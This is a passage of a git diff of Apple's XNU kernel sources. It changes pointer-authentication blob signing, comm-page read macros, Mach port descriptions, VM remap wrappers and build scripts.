.lm_mem_map = (uint8_t[MAX(1, (1 << ((size_order) - (min_order) + 1)) / 8)]){ 0 }, \ + .lm_cap_order = (size_order), \ + .lm_max_order = (max_order), \ + .lm_min_order = (min_order), \ + .lm_cnt_free = (1 << (size_order)) \ + }; + +/* + * Allocates memory from a respective logmem. Returns a pointer to the beginning + * of the allocated block. The resulting size of the allocated block is equal to or + * bigger than the size passed in during the call. + */ +void *logmem_alloc(logmem_t *, size_t *); + +/* + * Frees memory previously allocated by logmem_alloc(). The caller must call + * logmem_free() with the exact pointer and size value returned by logmem_alloc().
+ */ +void logmem_free(logmem_t *, void *, size_t); + +/* + * Returns the maximum memory size allocatable by the logmem. + */ +size_t logmem_max_size(const logmem_t *); + +#endif /* log_mem_h */ diff --git a/libkern/ptrauth_utils.c b/libkern/ptrauth_utils.c index 8385a23d1..cd0ddceac 100644 --- a/libkern/ptrauth_utils.c +++ b/libkern/ptrauth_utils.c @@ -40,8 +40,9 @@ * Sign a blob of data with the GA key * */ +__attribute__((noinline)) ptrauth_generic_signature_t -ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags) +ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags) { ptrauth_generic_signature_t sig = 0; @@ -58,22 +59,31 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int data ^= (uint64_t)ptr; } - /* First round adds salt */ + /* First round adds ptrauth_utils_sign_blob_generic discrimination. */ + sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-prologue") | 0x01); + + /* Second round adds salt */ sig = ptrauth_sign_generic_data(sig, data); /* Calculate an additive signature of the buffer */ for (uint64_t i = 0; i < rounds; i++) { - sig = ptrauth_sign_generic_data(*(uintptr_t *)ptr, sig); + sig = ptrauth_sign_generic_data(*(const uintptr_t *)ptr, sig); ptr += sizeof(uintptr_t); } /* ptrauth_sign_generic_data operates on pointer-sized values only, * so we need to handle trailing bytes for the non-pointer-aligned case */ if (ntrailing) { - memcpy(&trailing, ptr, ntrailing); + for (int i = 0; i < ntrailing; i++) { + ((uint8_t *)&trailing)[i] = ((const uint8_t *)ptr)[i]; + } sig = ptrauth_sign_generic_data(trailing, sig); } + + /* Final round to add an additional cookie */ + sig = ptrauth_sign_generic_data(sig, ptrauth_string_discriminator("ptrauth_utils_sign_blob_generic-epilogue") | 0x01); + return sig; } @@ -82,8 +92,9 @@ ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int * * 
Authenticate signature produced by ptrauth_utils_sign_blob_generic */ +__attribute__((noinline)) void -ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature) +ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature) { ptrauth_generic_signature_t calculated_signature = 0; diff --git a/libsa/conf/Makefile.template b/libsa/conf/Makefile.template index 308dc426a..b20de6a3d 100644 --- a/libsa/conf/Makefile.template +++ b/libsa/conf/Makefile.template @@ -68,7 +68,9 @@ KLD_FILES = $(OBJS) $(COMPONENT).filelist: $(OBJS) $(_v)for kld_file in ${KLD_FILES}; do \ - $(SEG_HACK) -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \ + $(SEG_HACK) -s __TEXT -n __KLD -o $${kld_file}__ $${kld_file} || exit 1; \ + mv $${kld_file}__ $${kld_file} || exit 1; \ + $(SEG_HACK) -i __KLD -n __KLDDATA -o $${kld_file}__ $${kld_file} || exit 1; \ mv $${kld_file}__ $${kld_file} || exit 1; \ done @$(LOG_LDFILELIST) "$(COMPONENT)" diff --git a/libsyscall/Libsyscall.xcconfig b/libsyscall/Libsyscall.xcconfig index 15531c0fe..6255b46ca 100644 --- a/libsyscall/Libsyscall.xcconfig +++ b/libsyscall/Libsyscall.xcconfig @@ -63,11 +63,6 @@ CLANG_WARN_SUSPICIOUS_MOVE = YES CODE_SIGN_IDENTITY = - DYLIB_CURRENT_VERSION = $(RC_ProjectSourceVersion) DYLIB_LDFLAGS = -umbrella System -all_load -DYLIB_LDFLAGS[sdk=iphoneos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=watchos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=tvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=appletvos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 -DYLIB_LDFLAGS[sdk=bridgeos*] = $(inherited) -Wl,-sectalign,__DATA,__data,1000 OTHER_LDFLAGS = $(SIMULATOR_LDFLAGS) SIMULATOR_LDFLAGS = SIMULATOR_LDFLAGS[sdk=macosx*] = -Wl,-simulator_support diff --git a/libsyscall/Libsyscall.xcodeproj/project.pbxproj 
b/libsyscall/Libsyscall.xcodeproj/project.pbxproj index 05e980948..74584782f 100644 --- a/libsyscall/Libsyscall.xcodeproj/project.pbxproj +++ b/libsyscall/Libsyscall.xcodeproj/project.pbxproj @@ -116,6 +116,7 @@ 24B8C2621237F53900D36CC3 /* remove-counter.c in Sources */ = {isa = PBXBuildFile; fileRef = 24B8C2611237F53900D36CC3 /* remove-counter.c */; }; 24D1158311E671B20063D54D /* SYS.h in Headers */ = {isa = PBXBuildFile; fileRef = 24D1157411E671B20063D54D /* SYS.h */; }; 24E4782712088267009A384D /* _libc_funcptr.c in Sources */ = {isa = PBXBuildFile; fileRef = 24E47824120881DF009A384D /* _libc_funcptr.c */; }; + 2561E8AA25082E6300EAA925 /* task.c in Sources */ = {isa = PBXBuildFile; fileRef = 2561E8A925082E6300EAA925 /* task.c */; }; 291D3C281354FDD100D46061 /* mach_port.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C261354FDD100D46061 /* mach_port.c */; }; 291D3C291354FDD100D46061 /* mach_vm.c in Sources */ = {isa = PBXBuildFile; fileRef = 291D3C271354FDD100D46061 /* mach_vm.c */; }; 29A59AE2183B0DE000E8B896 /* renameat.c in Sources */ = {isa = PBXBuildFile; fileRef = 29A59AE1183B0DE000E8B896 /* renameat.c */; }; @@ -553,6 +554,7 @@ 24D1159811E672270063D54D /* syscall.map */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = syscall.map; sourceTree = ""; }; 24D1159911E6723E0063D54D /* create-syscalls.pl */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.script.perl; path = "create-syscalls.pl"; sourceTree = ""; }; 24E47824120881DF009A384D /* _libc_funcptr.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = _libc_funcptr.c; sourceTree = ""; }; + 2561E8A925082E6300EAA925 /* task.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = task.c; sourceTree = ""; }; 291D3C261354FDD100D46061 /* mach_port.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_port.c; sourceTree = ""; }; 
291D3C271354FDD100D46061 /* mach_vm.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = mach_vm.c; sourceTree = ""; }; 29A59AE1183B0DE000E8B896 /* renameat.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = renameat.c; sourceTree = ""; }; @@ -761,6 +763,7 @@ C9D9BCCC114B00600000D8B9 /* err_libkern.sub */, C9D9BCCD114B00600000D8B9 /* err_mach_ipc.sub */, C9D9BCCE114B00600000D8B9 /* err_server.sub */, + 2561E8A925082E6300EAA925 /* task.c */, C9D9BCCF114B00600000D8B9 /* err_us.sub */, C9D9BCD0114B00600000D8B9 /* error_codes.c */, C9D9BCD1114B00600000D8B9 /* errorlib.h */, @@ -1487,6 +1490,7 @@ 24A7C5C111FF8DA6007669EB /* getsockname.c in Sources */, 925559921CBC23C300E527CE /* mach_boottime.c in Sources */, 24A7C5C211FF8DA6007669EB /* lchown.c in Sources */, + 2561E8AA25082E6300EAA925 /* task.c in Sources */, 24A7C5C311FF8DA6007669EB /* listen.c in Sources */, 24A7C5C411FF8DA6007669EB /* recvfrom.c in Sources */, 13CBF78224575F9F00B26F7D /* open-base.c in Sources */, diff --git a/libsyscall/mach/.gitignore b/libsyscall/mach/.gitignore deleted file mode 100644 index f718d68d2..000000000 --- a/libsyscall/mach/.gitignore +++ /dev/null @@ -1,3 +0,0 @@ -*.pbxuser -*.perspectivev3 -build/ diff --git a/libsyscall/mach/host.c b/libsyscall/mach/host.c index 6a7ec639e..6d977fd59 100644 --- a/libsyscall/mach/host.c +++ b/libsyscall/mach/host.c @@ -37,8 +37,7 @@ kern_return_t host_get_atm_diagnostic_flag(host_t host __unused, uint32_t *diagnostic_flag) { - volatile uint32_t *diagnostic_flag_address = (volatile uint32_t *)(uintptr_t)(_COMM_PAGE_ATM_DIAGNOSTIC_CONFIG); - *diagnostic_flag = *diagnostic_flag_address; + *diagnostic_flag = COMM_PAGE_READ(uint32_t, ATM_DIAGNOSTIC_CONFIG); return KERN_SUCCESS; } @@ -47,8 +46,7 @@ host_get_multiuser_config_flags(host_t host __unused, uint32_t *multiuser_flags) { #if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) - volatile uint32_t *multiuser_flag_address = 
(volatile uint32_t *)(uintptr_t)(_COMM_PAGE_MULTIUSER_CONFIG); - *multiuser_flags = *multiuser_flag_address; + *multiuser_flags = COMM_PAGE_READ(uint32_t, MULTIUSER_CONFIG); return KERN_SUCCESS; #else (void)multiuser_flags; diff --git a/libsyscall/mach/mach/mach_init.h b/libsyscall/mach/mach/mach_init.h index 4d9d51f46..e223fc8e2 100644 --- a/libsyscall/mach/mach/mach_init.h +++ b/libsyscall/mach/mach/mach_init.h @@ -64,6 +64,10 @@ #include +#ifndef KERNEL +#include +#endif + /* * Kernel-related ports; how a task/thread controls itself */ @@ -71,6 +75,8 @@ __BEGIN_DECLS extern mach_port_t mach_host_self(void); extern mach_port_t mach_thread_self(void); +__API_AVAILABLE(macos(11.3), ios(14.5), tvos(14.5), watchos(7.3)) +extern boolean_t mach_task_is_self(task_name_t task); extern kern_return_t host_page_size(host_t, vm_size_t *); extern mach_port_t mach_task_self_; diff --git a/libsyscall/mach/mach/port_descriptions.h b/libsyscall/mach/mach/port_descriptions.h index e237e2757..f96418b4b 100644 --- a/libsyscall/mach/mach/port_descriptions.h +++ b/libsyscall/mach/mach/port_descriptions.h @@ -44,6 +44,12 @@ const char *mach_host_special_port_description(int offset); */ const char *mach_task_special_port_description(int offset); +/* + * Returns a string describing the thread special port offset provided, or NULL if + * the provided offset is not a thread special port offset. + */ +const char *mach_thread_special_port_description(int offset); + /* * Returns the port for the given identifier of a host special port. For * instance, passing "HOST_PRIV_PORT" would return 1. @@ -59,6 +65,13 @@ int mach_host_special_port_for_id(const char *id); */ int mach_task_special_port_for_id(const char *id); +/* + * Returns the port for the given identifier of a thread special port. + * + * Returns -1 on error. 
+ */ +int mach_thread_special_port_for_id(const char *id); + __END_DECLS #endif /* !defined(_MACH_PORT_DESCRIPTIONS_) */ diff --git a/libsyscall/mach/mach_init.c b/libsyscall/mach/mach_init.c index 4206401a8..6a976709b 100644 --- a/libsyscall/mach/mach_init.c +++ b/libsyscall/mach/mach_init.c @@ -137,13 +137,13 @@ mach_init_doit(void) if (vm_kernel_page_shift == 0) { #if defined(__x86_64__) || defined(__i386__) - if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) { - vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT; + if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) { + vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT); } else { vm_kernel_page_shift = I386_PGSHIFT; } #else - vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT; + vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT); #endif vm_kernel_page_size = 1 << vm_kernel_page_shift; vm_kernel_page_mask = vm_kernel_page_size - 1; @@ -151,12 +151,12 @@ mach_init_doit(void) if (vm_page_shift == 0) { #if defined(__arm64__) - vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64; + vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64); #elif defined(__arm__) - vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_32; + vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_32); #else - if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) { - vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64; + if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) { + vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64); } else { vm_page_shift = vm_kernel_page_shift; } diff --git a/libsyscall/mach/mach_port.c b/libsyscall/mach/mach_port.c index 6a305be02..d9f564988 100644 --- a/libsyscall/mach/mach_port.c +++ b/libsyscall/mach/mach_port.c @@ -439,7 +439,7 @@ mach_port_space_basic_info( } static inline mach_port_t 
-_tsd_get_special_reply_port() +_tsd_get_special_reply_port(void) { return (mach_port_t)(uintptr_t)_os_tsd_get_direct(__TSD_MACH_SPECIAL_REPLY); } diff --git a/libsyscall/mach/mach_vm.c b/libsyscall/mach/mach_vm.c index 8b8dfa3fa..365d9a94b 100644 --- a/libsyscall/mach/mach_vm.c +++ b/libsyscall/mach/mach_vm.c @@ -222,6 +222,36 @@ mach_vm_remap( return rv; } +kern_return_t +mach_vm_remap_new( + mach_port_name_t target, + mach_vm_address_t *address, + mach_vm_size_t size, + mach_vm_offset_t mask, + int flags, + mach_port_name_t src_task, + mach_vm_address_t src_address, + boolean_t copy, + vm_prot_t *cur_protection, + vm_prot_t *max_protection, + vm_inherit_t inheritance) +{ + kern_return_t rv; + + /* {max,cur}_protection is inout */ + rv = _kernelrpc_mach_vm_remap_new(target, address, size, mask, flags, + src_task, src_address, copy, cur_protection, max_protection, + inheritance); + + if (__syscall_logger && rv == KERN_SUCCESS) { + int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem; + int userTagFlags = flags & VM_FLAGS_ALIAS_MASK; + __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0); + } + + return rv; +} + kern_return_t mach_vm_read( mach_port_name_t target, @@ -301,6 +331,36 @@ vm_remap( return rv; } +kern_return_t +vm_remap_new( + mach_port_name_t target, + vm_address_t *address, + vm_size_t size, + vm_offset_t mask, + int flags, + mach_port_name_t src_task, + vm_address_t src_address, + boolean_t copy, + vm_prot_t *cur_protection, + vm_prot_t *max_protection, + vm_inherit_t inheritance) +{ + kern_return_t rv; + + /* {max,cur}_protection is inout */ + rv = _kernelrpc_vm_remap_new(target, address, size, mask, flags, + src_task, src_address, copy, cur_protection, max_protection, + inheritance); + + if (__syscall_logger) { + int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem; + int userTagFlags = flags & 
VM_FLAGS_ALIAS_MASK; + __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0); + } + + return rv; +} + kern_return_t vm_read( mach_port_name_t target, diff --git a/libsyscall/mach/port_descriptions.c b/libsyscall/mach/port_descriptions.c index 2e086c80d..acf8c8390 100644 --- a/libsyscall/mach/port_descriptions.c +++ b/libsyscall/mach/port_descriptions.c @@ -29,6 +29,7 @@ #include #include #include +#include #include #include #include @@ -71,8 +72,9 @@ mach_host_special_port_description(int port) [HOST_SYSPOLICYD_PORT] = "syspolicyd", [HOST_FILECOORDINATIOND_PORT] = "filecoordinationd", [HOST_FAIRPLAYD_PORT] = "fairplayd", + [HOST_IOCOMPRESSIONSTATS_PORT] = "I/O compression stats", }; - _Static_assert(HOST_FAIRPLAYD_PORT == HOST_MAX_SPECIAL_PORT, + _Static_assert(HOST_IOCOMPRESSIONSTATS_PORT == HOST_MAX_SPECIAL_PORT, "all host special ports must have descriptions"); return hsp_descs[port_index]; @@ -92,6 +94,8 @@ mach_task_special_port_description(int port) [TASK_HOST_PORT] = "host", [TASK_NAME_PORT] = "name", [TASK_BOOTSTRAP_PORT] = "bootstrap", + [TASK_INSPECT_PORT] = "inspect", + [TASK_READ_PORT] = "read", [TASK_SEATBELT_PORT] = "seatbelt", [TASK_ACCESS_PORT] = "access", [TASK_DEBUG_CONTROL_PORT] = "debug control", @@ -103,6 +107,26 @@ mach_task_special_port_description(int port) return tsp_descs[port_index]; } +const char * +mach_thread_special_port_description(int port) +{ + int port_index = (int)port; + + if (port_index < 0 || port_index > THREAD_MAX_SPECIAL_PORT) { + return NULL; + } + + static const char *tsp_descs[] = { + [THREAD_KERNEL_PORT] = "kernel", + [THREAD_INSPECT_PORT] = "inspect", + [THREAD_READ_PORT] = "read", + }; + _Static_assert(THREAD_READ_PORT == THREAD_MAX_SPECIAL_PORT, + "all thread special ports must have descriptions"); + + return tsp_descs[port_index]; +} + static int port_for_id_internal(const char *id, const char **ids, int nids) { @@ -166,10 +190,25 @@ 
mach_task_special_port_for_id(const char *id) SP_ENTRY(TASK_HOST_PORT), SP_ENTRY(TASK_NAME_PORT), SP_ENTRY(TASK_BOOTSTRAP_PORT), + SP_ENTRY(TASK_INSPECT_PORT), + SP_ENTRY(TASK_READ_PORT), SP_ENTRY(TASK_SEATBELT_PORT), SP_ENTRY(TASK_ACCESS_PORT), SP_ENTRY(TASK_DEBUG_CONTROL_PORT), SP_ENTRY(TASK_RESOURCE_NOTIFY_PORT), + }; + + return port_for_id_internal(id, tsp_ids, + sizeof(tsp_ids) / sizeof(tsp_ids[0])); +} + +int +mach_thread_special_port_for_id(const char *id) +{ + static const char *tsp_ids[] = { + SP_ENTRY(THREAD_KERNEL_PORT), + SP_ENTRY(THREAD_INSPECT_PORT), + SP_ENTRY(THREAD_READ_PORT), #undef SP_ENTRY }; diff --git a/libsyscall/mach/task.c b/libsyscall/mach/task.c new file mode 100644 index 000000000..b93a0a256 --- /dev/null +++ b/libsyscall/mach/task.c @@ -0,0 +1,47 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 
+ * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#undef _task_user_ +#include + +extern mach_port_t mach_task_self_; + +boolean_t +mach_task_is_self(task_name_t task) +{ + boolean_t is_self; + kern_return_t kr; + + if (task == mach_task_self_) { + return TRUE; + } + + kr = _kernelrpc_mach_task_is_self(task, &is_self); + + return kr == KERN_SUCCESS && is_self; +} diff --git a/libsyscall/wrappers/__commpage_gettimeofday.c b/libsyscall/wrappers/__commpage_gettimeofday.c index a763dfae4..ccd2b33e3 100644 --- a/libsyscall/wrappers/__commpage_gettimeofday.c +++ b/libsyscall/wrappers/__commpage_gettimeofday.c @@ -55,9 +55,8 @@ __commpage_gettimeofday_internal(struct timeval *tp, uint64_t *tbr_out) volatile uint64_t *gtod_Ticks_scale_p; volatile uint64_t *gtod_Ticks_per_sec_p; - new_commpage_timeofday_data_t *commpage_timeofday_datap; - - commpage_timeofday_datap = (new_commpage_timeofday_data_t *)_COMM_PAGE_NEWTIMEOFDAY_DATA; + COMM_PAGE_SLOT_TYPE(new_commpage_timeofday_data_t) commpage_timeofday_datap = + COMM_PAGE_SLOT(new_commpage_timeofday_data_t, NEWTIMEOFDAY_DATA); gtod_TimeStamp_tick_p = &commpage_timeofday_datap->TimeStamp_tick; gtod_TimeStamp_sec_p = &commpage_timeofday_datap->TimeStamp_sec; diff --git a/libsyscall/wrappers/_libkernel_init.c b/libsyscall/wrappers/_libkernel_init.c index 6440b6098..d1eac6f21 100644 --- a/libsyscall/wrappers/_libkernel_init.c +++ b/libsyscall/wrappers/_libkernel_init.c @@ -30,6 +30,7 @@ #include #include #include +#include #include "_libkernel_init.h" extern int mach_init(void); @@ -81,6 +82,19 @@ __libkernel_init(_libkernel_functions_t fns, _dlsym = fns->dlsym; } mach_init(); +#if TARGET_OS_OSX + for (size_t i = 0; envp[i]; i++) { + +#if defined(__i386__) || defined(__x86_64__) + const char *VM_KERNEL_PAGE_SHIFT_ENV = "VM_KERNEL_PAGE_SIZE_4K=1"; + if (vm_kernel_page_shift != 12 && strcmp(VM_KERNEL_PAGE_SHIFT_ENV, 
envp[i]) == 0) { + vm_kernel_page_shift = 12; + vm_kernel_page_size = 1 << vm_kernel_page_shift; + vm_kernel_page_mask = vm_kernel_page_size - 1; + } +#endif /* defined(__i386__) || defined(__x86_64__) */ + } +#endif /* TARGET_OS_OSX */ } void diff --git a/libsyscall/wrappers/getiopolicy_np.c b/libsyscall/wrappers/getiopolicy_np.c index e09f849cc..01d462b49 100644 --- a/libsyscall/wrappers/getiopolicy_np.c +++ b/libsyscall/wrappers/getiopolicy_np.c @@ -33,12 +33,7 @@ getiopolicy_np(int iotype, int scope) int policy, error; struct _iopol_param_t iop_param; - if ((iotype != IOPOL_TYPE_DISK && iotype != IOPOL_TYPE_VFS_ATIME_UPDATES && iotype != IOPOL_TYPE_VFS_MATERIALIZE_DATALESS_FILES) || - (scope != IOPOL_SCOPE_PROCESS && scope != IOPOL_SCOPE_THREAD)) { - errno = EINVAL; - policy = -1; - goto exit; - } + /* Do not sanity check iotype and scope, leave it to kernel. */ iop_param.iop_scope = scope; iop_param.iop_iotype = iotype; diff --git a/libsyscall/wrappers/kdebug_trace.c b/libsyscall/wrappers/kdebug_trace.c index d7409d541..af0059562 100644 --- a/libsyscall/wrappers/kdebug_trace.c +++ b/libsyscall/wrappers/kdebug_trace.c @@ -84,7 +84,7 @@ kdebug_typefilter(void) bool kdebug_is_enabled(uint32_t debugid) { - uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE)); + uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE); if (state == 0) { return FALSE; @@ -119,7 +119,7 @@ kdebug_is_enabled(uint32_t debugid) bool kdebug_using_continuous_time(void) { - uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE)); + uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE); return state & KDEBUG_ENABLE_CONT_TIME; } diff --git a/libsyscall/wrappers/mach_approximate_time.c b/libsyscall/wrappers/mach_approximate_time.c index cb199cf07..50fc667b9 100644 --- a/libsyscall/wrappers/mach_approximate_time.c +++ b/libsyscall/wrappers/mach_approximate_time.c @@ -30,9 +30,8 @@ extern uint64_t mach_absolute_time(void); uint64_t 
mach_approximate_time(void) { - uint8_t supported = *((uint8_t *)_COMM_PAGE_APPROX_TIME_SUPPORTED); - if (supported) { - return *((uint64_t *)_COMM_PAGE_APPROX_TIME); + if (COMM_PAGE_READ(uint8_t, APPROX_TIME_SUPPORTED)) { + return COMM_PAGE_READ(uint64_t, APPROX_TIME); } return mach_absolute_time(); } diff --git a/libsyscall/wrappers/mach_boottime.c b/libsyscall/wrappers/mach_boottime.c index 5028f3a65..4a262e5e3 100644 --- a/libsyscall/wrappers/mach_boottime.c +++ b/libsyscall/wrappers/mach_boottime.c @@ -25,5 +25,5 @@ uint64_t mach_boottime_usec(void) { - return *(uint64_t*)_COMM_PAGE_BOOTTIME_USEC; + return COMM_PAGE_READ(uint64_t, BOOTTIME_USEC); } diff --git a/libsyscall/wrappers/mach_bridge_remote_time.c b/libsyscall/wrappers/mach_bridge_remote_time.c index e90846034..1158c2431 100644 --- a/libsyscall/wrappers/mach_bridge_remote_time.c +++ b/libsyscall/wrappers/mach_bridge_remote_time.c @@ -50,7 +50,8 @@ mach_bridge_remote_time(__unused uint64_t local_time) uint64_t now = 0; struct bt_params params = {}; - volatile struct bt_params *commpage_bt_params_p = (struct bt_params *)_COMM_PAGE_REMOTETIME_PARAMS; + COMM_PAGE_SLOT_TYPE(struct bt_params) commpage_bt_params_p = + COMM_PAGE_SLOT(struct bt_params, REMOTETIME_PARAMS); volatile uint64_t *base_local_ts_p = &commpage_bt_params_p->base_local_ts; volatile uint64_t *base_remote_ts_p = &commpage_bt_params_p->base_remote_ts; volatile double *rate_p = &commpage_bt_params_p->rate; diff --git a/libsyscall/xcodescripts/mach_install_mig.sh b/libsyscall/xcodescripts/mach_install_mig.sh index f51db78e4..ba650e974 100755 --- a/libsyscall/xcodescripts/mach_install_mig.sh +++ b/libsyscall/xcodescripts/mach_install_mig.sh @@ -33,7 +33,9 @@ cd $OBJROOT MIG=`xcrun -sdk "$SDKROOT" -find mig` MIGCC=`xcrun -sdk "$SDKROOT" -find cc` export MIGCC -MIG_DEFINES="-DLIBSYSCALL_INTERFACE" +[ -n "$DRIVERKITROOT" ] && MIG_DRIVERKIT_DEFINES="-DDRIVERKIT" +MIG_DEFINES="-DLIBSYSCALL_INTERFACE $MIG_DRIVERKIT_DEFINES" 
+MIG_PRIVATE_DEFINES="-DPRIVATE -D_OPEN_SOURCE_ -D__OPEN_SOURCE__" MIG_HEADER_OBJ="$OBJROOT/mig_hdr/include/mach" MIG_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach" MIG_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach" @@ -41,8 +43,7 @@ SERVER_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/servers" MACH_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach" MACH_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach" MIG_INTERNAL_HEADER_DST="$BUILT_PRODUCTS_DIR/internal_hdr/include/mach" -MIG_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/include -I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/local/include" -MIG_PRIVATE_DEFS_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/System/Library/Frameworks/System.framework/PrivateHeaders" +MIG_INCFLAGS="-I${SRCROOT}/../osfmk" SRC="$SRCROOT/mach" FILTER_MIG="$SRCROOT/xcodescripts/filter_mig.awk" @@ -96,6 +97,7 @@ fi MIGS_INTERNAL="mach_port.defs mach_vm.defs + task.defs thread_act.defs vm_map.defs" @@ -161,7 +163,7 @@ mkdir -p $MIG_PRIVATE_HEADER_DST for mig in $MIGS_PRIVATE $MIGS_DUAL_PUBLIC_PRIVATE; do MIG_NAME=`basename $mig .defs` - $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_INCFLAGS $MIG_PRIVATE_DEFS_INCFLAGS $SRC/$mig + $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_PRIVATE_DEFINES $MIG_INCFLAGS $SRC/$mig if [ ! -e "$MIG_HEADER_DST/$MIG_NAME.h" ]; then echo "#error $MIG_NAME.h unsupported." 
> "$MIG_HEADER_DST/$MIG_NAME.h" fi @@ -178,4 +180,4 @@ for mig in $MIGS_INTERNAL; do MIG_NAME=`basename $mig .defs` $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_INTERNAL_HEADER_DST/${MIG_NAME}_internal.h" $MIG_INCFLAGS $SRC/$mig done - + \ No newline at end of file diff --git a/makedefs/MakeInc.cmd b/makedefs/MakeInc.cmd index 63dd0de03..32ac9d6d5 100644 --- a/makedefs/MakeInc.cmd +++ b/makedefs/MakeInc.cmd @@ -209,6 +209,9 @@ endif ifeq ($(NMEDIT),) export NMEDIT := $(shell $(XCRUN) -sdk $(SDKROOT) -find nmedit) endif +ifeq ($(SCAN_BUILD),) + export SCAN_BUILD := $(shell $(XCRUN) -sdk $(SDKROOT) -find scan-build) +endif # # Platform options @@ -258,6 +261,7 @@ SLEEP = /bin/sleep AWK = /usr/bin/awk SED = /usr/bin/sed PLUTIL = /usr/bin/plutil +GREP = /usr/bin/grep # # Command to generate host binaries. Intentionally not diff --git a/makedefs/MakeInc.def b/makedefs/MakeInc.def index 5c5ef1a92..b2e90a4a3 100644 --- a/makedefs/MakeInc.def +++ b/makedefs/MakeInc.def @@ 